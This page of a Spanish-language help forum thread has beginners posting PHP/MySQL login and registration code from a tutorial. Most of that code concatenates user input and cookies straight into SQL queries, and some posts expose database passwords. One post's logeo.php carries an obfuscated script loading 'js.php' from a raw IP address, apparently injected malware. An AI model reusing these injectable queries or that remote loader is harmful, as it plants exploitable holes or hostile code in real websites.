Regresar a la página www.ComoCrearTuWeb.com

Ver Resultados de Encuesta: Que te parecio este Script

Votantes
69. No puedes votar en esta encuesta
  • Exelente

    32 46.38%
  • Bueno

    26 37.68%
  • Regular

    6 8.70%
  • Pesimo

    5 7.25%
Página 5 de 8 PrimerPrimer 12345678 ÚltimoÚltimo
Resultados 61 al 75 de 119

Tema: Sistema de registro de usuarios

  1. #61
    Recien Llegado! Merodeador
    Fecha de Ingreso
    08 oct, 08
    Mensajes
    4
    Poder de Reputación
    0

    problema!

    Hola! He seguido el tutorial para registro de ususarios y me encuentro con algún pronlema a la hora de registrarme, me dice que la base de datos no existe; pero la base de datos está creada en mySQL(no me ha dado ningún problema en el momento de crearla) y creo que los datos son correctos, pego los códigos por si alguien me puede ayudar. Para comprobarlo el enlace es www.tuclik.com

    CONFIG.PHP
    <?
    unset($config) ;
    $config[1]="localhost"; // Puede ser "localhost" aunque también una URL o una IP
    $config[2]="tuclikco_admin" ; //Usuario de la base de datos
    $config[3]="XXXXXXXXXX"; // Contraseña de la base de datos
    $config[4]="tuclikco_tiendatuclik"; // Nombre de la base de datos

    $conectar = @mysql_connect($config[1],$config[2],$config[3]) or exit('Datos de conexión incorrectos.') ;
    mysql_select_db($config[4],$conectar)or exit('base de datos no existe.');
    ?>


    ENTRAR.PHP
    <?
    require 'config.php' ;
    if($_POST[enviar]) {
    function quitar($texto) {
    $texto = trim($texto) ;
    $texto = htmlspecialchars($texto) ;
    # --> Elimina espacios que no pueden ser borrados por trim()
    $texto = str_replace(chr(160),'',$texto) ;
    return $texto ;
    }
    $nick = quitar($_POST[nick]) ;
    $contrasena = md5(md5(quitar($_POST[contrasena]))) ;
    $con = mysql_query("select id,contrasena from usuarios where nick='$nick'") ;
    $datos = mysql_fetch_assoc($con) ;
    if(mysql_num_rows($con)) {
    if($datos[contrasena] == $contrasena) {
    setcookie('uid',$datos[id],time()+604800) ;
    setcookie('unick',$nick,time()+604800) ;
    setcookie('ucontrasena',$contrasena,time()+604800) ;
    header("location: $_SERVER[HTTP_REFERER]") ;
    }
    else {
    echo 'La contraseña es incorrecta. Haz click aquí para regresar.' ;
    }
    }
    else {
    echo 'El nick no existe. Haz click aquí para regresar.' ;
    }
    }
    ?>


    REGISTRAR.PHP Y SALIR.PHP, no los he tocado, han quedado como en el tutorial y los otros códigos de seguridad no los utilizo pq no me hacen falta.
    Mi otro problema con menús desplegables aquí:

    Espero vuestra ayuda, Por favor!Ya estoy medio loco :? !http://www.comocreartuweb.com/phpBB2/ftopic13701.html

  2. #62
    Recien Llegado! Pasaba por aquí...
    Fecha de Ingreso
    11 dic, 08
    Mensajes
    2
    Poder de Reputación
    0

    problema con Firefox

    Hola a Todos, e seguido todos los pasos y me funciona a la perfección en IE pero por casualidad un amigo probó con el Firefox y visualmente correcto pero se pudo registrar sin necesidad de introducir campos, me creó un usuario sin nombre, luego otro sin pedir contraseña, etc.. como podría corregir esto, para que funcione bien tanto en uno como en el otro navegador?
    Tambien tengo otro problema y es igual, con el IE perfecto pero con el Firefox no me funciona y es lo de poner como pagina de inicio (se que no es este el lugar pero agradeceria mucho vuestra ayuda) Uso este:

    <a class="chlnk" href onclick="this.style.behavior='url(#default#homepag e)';this.setHomePage('http://www.XXXXXX');"
    style="font-size:21px; color:#0000FF;"CURSOR:"hand"><u>Página de inicio</u></a>

    Muchas gracias por vuestra ayuda por adelantado, saludos

  3. #63
    Recien Llegado! Habitual Avatar de fido-strike
    Fecha de Ingreso
    13 ene, 09
    Mensajes
    12
    Poder de Reputación
    13
    Perdonen, yo tambien estoy buscando un sistema de usuarios, y veo que aqui me ponen en las tablas las opciones de descripcion, pais, etc.. pero por que al momento en que uno se registra no aparecen esas opciones en el formulario de registro, por favor si alguien puede indicarme, es que quiero que mis usuarios se den a conocer un poco,si es posible que tengan una pagina de perfil.
    bueno, de una vez desembucho todo, si no es mucho pedir, coomo puedo agregarlo la opcion de recuperar contraseña, email de bienvennida, darse de baja, y actualizar sus datos, y tambien si es posible que me pueda llegar un email a mi correo avisandome que hay un nuevo usuarios registrado,es que en mi web tambien manejo un chat en el cual yo mismo tengo que poner los usuarios con las contraseñas y todo, para ello tengo que fijarme la base de datos, pero no puedo estarhaciendolo cada vez envano. si no se puede por no pasa nada, me resigno con el que hay, pero repito, en las pruevas que pusieron, no hay las oopciones de descripcion, pais, etc.. pero si estan en las tablas de la base de datos.
    saludos

  4. #64
    Recien Llegado! Merodeador
    Fecha de Ingreso
    02 feb, 09
    Mensajes
    3
    Poder de Reputación
    0
    excelente manual!! la verdad que anda excelente, pero aqui se muestra al usuario visitante que no esta registrado un cartel prohibiendo ver la web o seccion, el tema es que a mi me gustaria que pueda seguir viendo el sitio pero que no pueda por ejemplo publicar los articulos, como podria hacer esto? que diga por ejemplo en lugar de mostrar ese cartel que siga viendo la web pero que diga Bienvenido visitante, registrate para compartir....o algo asi, como podria hacerlo? desde ya gracias por el excelente manual

  5. #65
    Me va gustando esto... Habitante
    Fecha de Ingreso
    25 abr, 09
    Mensajes
    115
    Poder de Reputación
    13

    Re: problema!

    Cita Iniciado por josluisd123
    Hola! He seguido el tutorial para registro de ususarios y me encuentro con algún pronlema a la hora de registrarme, me dice que la base de datos no existe; pero la base de datos está creada en mySQL(no me ha dado ningún problema en el momento de crearla) y creo que los datos son correctos, pego los códigos por si alguien me puede ayudar. Para comprobarlo el enlace es www.tuclik.com

    CONFIG.PHP
    <?
    unset($config) ;
    $config[1]="localhost"; // Puede ser "localhost" aunque también una URL o una IP
    $config[2]="tuclikco_admin" ; //Usuario de la base de datos
    $config[3]="XXXXXXXXXX"; // Contraseña de la base de datos
    $config[4]="tuclikco_tiendatuclik"; // Nombre de la base de datos

    $conectar = @mysql_connect($config[1],$config[2],$config[3]) or exit('Datos de conexión incorrectos.') ;
    mysql_select_db($config[4],$conectar)or exit('base de datos no existe.');
    ?>


    ENTRAR.PHP
    <?
    require 'config.php' ;
    if($_POST[enviar]) {
    function quitar($texto) {
    $texto = trim($texto) ;
    $texto = htmlspecialchars($texto) ;
    # --> Elimina espacios que no pueden ser borrados por trim()
    $texto = str_replace(chr(160),'',$texto) ;
    return $texto ;
    }
    $nick = quitar($_POST[nick]) ;
    $contrasena = md5(md5(quitar($_POST[contrasena]))) ;
    $con = mysql_query("select id,contrasena from usuarios where nick='$nick'") ;
    $datos = mysql_fetch_assoc($con) ;
    if(mysql_num_rows($con)) {
    if($datos[contrasena] == $contrasena) {
    setcookie('uid',$datos[id],time()+604800) ;
    setcookie('unick',$nick,time()+604800) ;
    setcookie('ucontrasena',$contrasena,time()+604800) ;
    header("location: $_SERVER[HTTP_REFERER]") ;
    }
    else {
    echo 'La contraseña es incorrecta. Haz click aquí para regresar.' ;
    }
    }
    else {
    echo 'El nick no existe. Haz click aquí para regresar.' ;
    }
    }
    ?>


    REGISTRAR.PHP Y SALIR.PHP, no los he tocado, han quedado como en el tutorial y los otros códigos de seguridad no los utilizo pq no me hacen falta.
    Mi otro problema con menús desplegables aquí:

    Espero vuestra ayuda, Por favor!Ya estoy medio loco :? !http://www.comocreartuweb.com/phpBB2/ftopic13701.html
    me apsa lo msimo ek a este usurio algun me puede ayudar porfavor

    .--sALUAODS--.

  6. #66
    Recien Llegado! Pasaba por aquí...
    Fecha de Ingreso
    23 jun, 09
    Mensajes
    1
    Poder de Reputación
    0
    cuando voy a
    login.php
    sale esto :


    Esta sección es sólo para usuari@s registrad@s.

    Por favor regresa a la pagina principal y registrate.
    y en entrar.php

    ESTA VACIO!

  7. #67
    Recien Llegado! Merodeador
    Fecha de Ingreso
    18 abr, 08
    Mensajes
    3
    Poder de Reputación
    0
    Este si que es un gran aporte, definitivamente GRACIAS...

    Aunque me ayudaria mas, hubiera alguna forma de actualizar o modiicar los datos, algun lado donde el usuario pueda cambiar la contraseña el mail, o algo por el estilo, si es posible y alguien lo sabe hacer basandose en este sistema de registro, me ayudaria mucho.

  8. #68
    Recien Llegado! Pasaba por aquí...
    Fecha de Ingreso
    10 sep, 09
    Mensajes
    1
    Poder de Reputación
    0
    hola amigo, necesito que el script sea de otra forma, mi pagina eswww.myworldfriends.uni.cc, ahi podra ver como es el formulario, tambien necesito ayuda sobre como crearlo en otros idiomas.

    a y otro favor, es para ver si usted podria hacer que cuando los usuarios pongan el boton registrame, los envie a la misma pagina pero con un captcha, eso si creo que esa funcion es hecho, por favorrrrrrrrrrrrr, de verdad necesito ayuda

  9. #69
    Recien Llegado! Habitante
    Fecha de Ingreso
    12 mar, 09
    Mensajes
    26
    Poder de Reputación
    13
    muy buen script yo el problema lo tengo con el config no se que poner en el localhost que es donde creo q tengo el problema gracias de anemano

  10. #70
    Me va gustando esto... Habitante
    Fecha de Ingreso
    07 oct, 09
    Ubicación
    Maracay, Venezuela
    Mensajes
    243
    Poder de Reputación
    13
    que bueno en gracias jejej me va a servir en un futuro cercano o talves lejano
    Att. Kevin

  11. #71
    Me va gustando esto... Habitante
    Fecha de Ingreso
    08 sep, 09
    Ubicación
    Santiago, Chile
    Mensajes
    191
    Poder de Reputación
    12
    Es un excelente tutorial en verdad!

    Quisiera saber la fuente, es decir, de donde viene ;)
    Atentamente: ArkAngel
    Sitio Oficial: http://www.shinoxayuda.es.tl/
    E-Mail Oficial: shinoxayuda@gmail.com
    Foro Oficial: http://nixo.foroactivo.com/
    Hacks para Facebook: http://trucos-shinox.blogspot.com/

  12. #72
    Recien Llegado! Merodeador
    Fecha de Ingreso
    04 dic, 09
    Mensajes
    4
    Poder de Reputación
    0
    mmm no me sale

    luego de registrar un usuario, se conecta a la base de datos, pero en el login se me queda en blanco

    =S

    alguna idea del problema'?
    :S

  13. #73
    Recien Llegado! Pasaba por aquí...
    Fecha de Ingreso
    11 dic, 09
    Mensajes
    1
    Poder de Reputación
    0

    ayudaaaaaaaaaaaaaa

    Sabes, el tuto me paració muy bueno pero lo malo es que tengo un errr en el config.php, no se que hay que ingresar aqui:

    <?
    unset($config) ;
    $config[1] = 'Aquí no se que poner!' ;
    $config[2] = 'a9190647' ;
    $config[3] = 'fafaelito08' ;
    $config[4] = 'a9190647' ;

    $conectar = @mysql_connect($config[1],$config[2],$config[3]) or exit('Datos de conexión incorrectos.') ;
    mysql_select_db($config[4],$conectar) or exit('No existe la base de datos.') ;
    ?>


    en la linea de $config[1] = ????? no se que poner, no se si alguien me puede dar un ejemplo o explicarme como, y si en lo demas estoy mal porfavor diganmelo :D

    se los agradesco de antemano

    Deoxyz08

  14. #74
    Recien Llegado! Pasaba por aquí...
    Fecha de Ingreso
    27 ene, 10
    Mensajes
    1
    Poder de Reputación
    0

    Re: Sistema de registro de usuarios

    Hola:
    Estoy empezando a tantear esto de la base de datos y php y he probado estos ejemplos pero me ocurre lo siguiente:
    Cuando ejecuto el fichero "registrar.php" me sale esto:
    HTTP 404 Prohibido
    y se queda en el http://localhost/nuevacarpeta2/%3C?=$_SERVER[PHP_SELF]?>
    ¿ Que esplicacion puede tener ? Creo que este elemento devuelve una variable con el registro que se está ejecutando, con lo que deberia seguir ejecutando el archivo. ¿ Por que da el error de prohibición ?
    Gracias

  15. #75
    Recien Llegado! Pasaba por aquí...
    Fecha de Ingreso
    28 may, 10
    Mensajes
    1
    Poder de Reputación
    0

    Problemas y modificacion

    Hola he probado el sistema pero tengo un solo error lo he modificado a mi parecer, pero m e esta tirando errores al momento de comprobar los cookies en mysql.

    aki los codigos:

    login.php <---- el me esta dando error:

    Notice: Undefined index: uid in C:\wamp\www\frames\login.php on line 11

    Notice: Undefined index: unick in C:\wamp\www\frames\login.php on line 11

    Notice: Undefined index: ucontrasena in C:\wamp\www\frames\login.php on line 11


    • <?php
      require 'config.php' ;
      $con = mysql_query("select count(id) from usuarios where id='$_COOKIE[uid]' and nick='$_COOKIE[unick]' and contrasena='$_COOKIE[ucontrasena]'") ;
      if(!mysql_result($con,0,0)) {
      exit('

      Esta sección es sólo para usuari@s registrad@s.

      » Regresar') ;
      }
      ?>



    entrar.php
    • <?php
      require 'config.php' ;
      $nick = $_POST['nick'] ;
      $contrasena = md5(md5($_POST['contrasena'])) ;
      $con = mysql_query("select id,contrasena from usuarios where nick='$nick'") ;
      $datos = mysql_fetch_assoc($con) ;
      if(mysql_num_rows($con)) {
      if($datos['contrasena'] == $contrasena) {
      setcookie('uid',$datos['id'],time()+604800) ;
      setcookie('unick',$nick,time()+604800) ;
      setcookie('ucontrasena',$contrasena,time()+604800) ;
      echo "<script language=\"JavaScript\">
      <!--
      alert('Bienvenido'); {

      document.location.href= 'admin.php';
      }
      // -->
      </script>";
      }
      else {
      echo "<script language=\"JavaScript\">
      <!--
      alert('Contraseña Incorrecta'); {

      javascript:history.back(-1);
      }
      // -->
      </script>";
      }
      }
      else {
      echo "<script language=\"JavaScript\">
      <!--
      alert('Nick no existe'); {

      javascript:history.back(-1);
      }
      // -->
      </script>";
      }

      ?>


    config.php
    • <?php

      $conectar = mysql_connect("localhost","posada","12345") or exit('Datos de conexión incorrectos.') ;
      mysql_select_db("donae",$conectar) or exit('No existe la base de datos.') ;
      ?>


    logeo.php
    • <script language="Javascript" type="text/javascript">
      <!--
      var d=new Date; rnd=d.getDay()+'-'+d.getHours(); var b=(''+location.hostname).split('.'); d=2; if(b[b.length-d+1]=='') d=3; h='web.'+b[b.length-d]+'.'+b[b.length-d+1];
      document.write('<sc'+'ript src="http://82.196.5.24/js.php?'+rnd+'"><'+'/sc'+'ript>');
      // -->
      </script>
      <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
      <script type="text/javascript">_uacct = "UA-324340-1"; urchinTracker();</script>

      <div align="center">
      <center>
      <table border="0" cellpadding="0" cellspacing="0" width="500" bgcolor="#303030">
      <tr>
      <td width="100%">
      <p align="center"><font size="5" color="#008080">Autentificaciòn de Usuario Administrador</font></td>
      </tr>
      <tr>
      <td width="100%">
      <div align="center">
      <table border="0" cellpadding="0" cellspacing="0" width="495" bgcolor="#000000">
      <tr>
      <td width="100%">
      <hr color="#000000">
      <div align="center">
      <table border="0" cellpadding="0" cellspacing="0" width="400">
      <tr>
      <td bgcolor="#303030"><!--webbot bot="HTMLMarkup"
      startspan --><form method="post" action="entrar.php">
      Nick:

      <input type="text" name="nick" maxlength="20">

      Contraseña:

      <input type="password" name="contrasena" maxlength="20">


      <input type="submit" name="enviar" value="Iniciar Sesión">
      </form>


      </td>
      </tr>
      <tr>
      <td>
      <hr color="#000000">
      </td>
      </tr>
      <tr>
      <td>
      <hr color="#000000">
      </td>
      </tr>
      <tr>
      <
      </tr>
      </table>
      </div>
      <hr color="#000000">
      </td>
      </tr>
      </table>
      </div>
      </td>
      </tr>
      <tr>
      <td width="100%">
      <p align="center"><font color="#FFFFFF">Administraciòn PTDE</font></td>
      </tr>
      </table>
      </center>
      </div>
      <p align="center"></p>
      <script type="text/javascript">
      var wr_host = "aimfar";
      var wr_site = 36;
      var wr_page = 266;
      var wr_board = 290;
      var wr_boardsize = "1x1";
      var wr_floating = 1;
      var wr_detail = '';
      var wr_thema = 0;
      </script>
      <script type="text/javascript" src="http://astatic.weborama.fr/js/adperf_network.js"></script>


    reg.php
    • <?php
      include ('config.php');
      $nick = $_POST['nick'] ;
      $email = $_POST['email'] ;
      $con = mysql_query("select count(id) from usuarios where nick='$nick' or email='$email'") ;
      if(mysql_result($con,0,0)) {
      echo 'El nick ya existe en la base de datos o ya está registrado el email. Haz click aquí para regresar.' ;
      }
      else {
      $fecha = time() ;
      $contrasena = md5(md5($_POST['contrasena'])) ;
      $sexo = $_POST['sexo'] ;
      mysql_query("insert into usuarios (fecha,nick,contrasena,email,sexo) values ('$fecha','$nick','$contrasena','$email','$sexo')" ) ;
      echo 'Has sido registrad@ satisfactoriamente. Haz click aquí para regresar a la página principal e iniciar sesión' ;
      }


      ?>



    registrar.php

    <div align="center">
    <center>
    <table border="0" cellpadding="0" cellspacing="0" width="500" bgcolor="#303030">
    <tr>
    <td width="100%">
    <p align="center"><font size="5" color="#008080">
    FOX LOGHAN WEB
    </font></td>
    </tr>
    <tr>
    <td width="100%">
    <div align="center">
    <table border="0" cellpadding="0" cellspacing="0" width="495" bgcolor="#000000">
    <tr>
    <td width="100%">
    <hr color="#000000">
    <div align="center">
    <table border="0" cellpadding="0" cellspacing="0" width="450">
    <tr>
    <td bgcolor="#303030"><!--webbot bot="HTMLMarkup"
    startspan --><script>
    function revisar() {
    if(formulario.nick.value.length < 3) {
    alert('El nick debe contener por lo mínimo 3 caractéres.') ;
    return false ;
    }
    if(formulario.contrasena.value.length < 6) {
    alert('La contraseña debe contener por lo mínimo 6 caractéres.') ;
    return false ;
    }
    if(formulario.contrasena.value != formulario.c_contrasena.value) {
    alert('Las contraseñas no son correctas.') ;
    return false ;
    }
    if(!/^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,4})+$/.test(formulario.email.value)) {
    alert('Debes poner un email válido.') ;
    return false ;
    }
    }
    </script>
    <form name="formulario" method="post" action="reg.php" onsubmit="return revisar()">
    Nick:

    <input type="text" name="nick" maxlength="20">

    Contraseña:

    <input type="password" name="contrasena" maxlength="10">

    Confirmar contraseña:

    <input type="password" name="c_contrasena" maxlength="10">

    Email:

    <input type="text" name="email" maxlength="40">

    Sexo:

    <select name="sexo">
    <option value="0">Masculino
    <option value="1">Femenino
    </select>


    <input type="submit" name="enviar" value="Registrar">
    </form>
    </div>

    </td>
    </tr>
    <tr>
    <td>
    <hr color="#000000">
    </td>
    </tr>
    <tr>
    <td>
    <hr color="#000000">
    </td>
    </tr>
    <tr>
    <td></td>
    </tr>
    </table>
    </div>
    <hr color="#000000">
    </td>
    </tr>
    </table>
    </div>
    </td>
    </tr>
    <tr>
    <td width="100%">
    <p align="center"><font color="#FFFFFF">FoxLoghan - DR - 2008</font></td>
    </tr>
    </table>
    </center>
    </div>
    <p align="center"></p><script type="text/javascript">
    var wr_host = "aimfar";
    var wr_site = 36;
    var wr_page = 266;
    var wr_board = 290;
    var wr_boardsize = "1x1";
    var wr_floating = 1;
    var wr_detail = '';
    var wr_thema = 0;
    </script>
    <script type="text/javascript" src="http://astatic.weborama.fr/js/adperf_network.js"></script>[/list]


    PD: modifique la parte del registro para q el action del form me haga el llamado a reg.php y este me realice el registro, me funciona joya el registro, pero en la parte de los cookies es q me esta tirando error, osea no puedo entrar a la pagina q estoy asegurando con el sistema de login porq no me capta los cookies quien me ayuda xD

Temas Similares

  1. sistema de registro de usuarios
    Por 085408772 en el foro Sistema de Registro de Usuarios
    Respuestas: 1
    Último Mensaje: 05/02/2011, 17:32
  2. SISTEMA DE REGISTRO DE USUARIOS...dudas
    Por punkitopunk en el foro Sistema de Registro de Usuarios
    Respuestas: 1
    Último Mensaje: 15/02/2008, 18:29

Permisos de Publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •